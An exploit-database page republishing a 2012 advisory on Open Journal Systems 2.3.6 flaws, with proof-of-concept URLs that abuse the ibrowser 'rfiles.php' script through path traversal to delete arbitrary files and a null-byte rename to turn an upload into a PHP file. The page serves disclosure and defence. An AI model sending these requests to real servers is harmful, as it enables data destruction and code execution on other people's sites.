Lucene search

K
exploitdbHigh-Tech BridgeEDB-ID:37002
HistoryMar 21, 2012 - 12:00 a.m.

Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation

2012-03-2100:00:00
High-Tech Bridge
www.exploit-db.com
55
open journal systems
arbitrary file deletion
security vulnerability
arbitrary file upload
cross-site scripting
administrative privileges
cookie-based authentication
version 2.3.6
file renaming
exploit

AI Score

7.4

Confidence

Low

EPSS

0.004

Percentile

73.3%

source: https://www.securityfocus.com/bid/52666/info
    
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
    
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
    
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
    
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. 

http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=delete|/../../../../../../../../../../../../../../../../../../../temp/file_to_delete

Arbitrary File Renaming:
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|file.jpg|file.php%00.jpg
http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|/../../../../../../../../../../../../../../../../../../../tmp/file_to_move|1x.jpg

AI Score

7.4

Confidence

Low

EPSS

0.004

Percentile

73.3%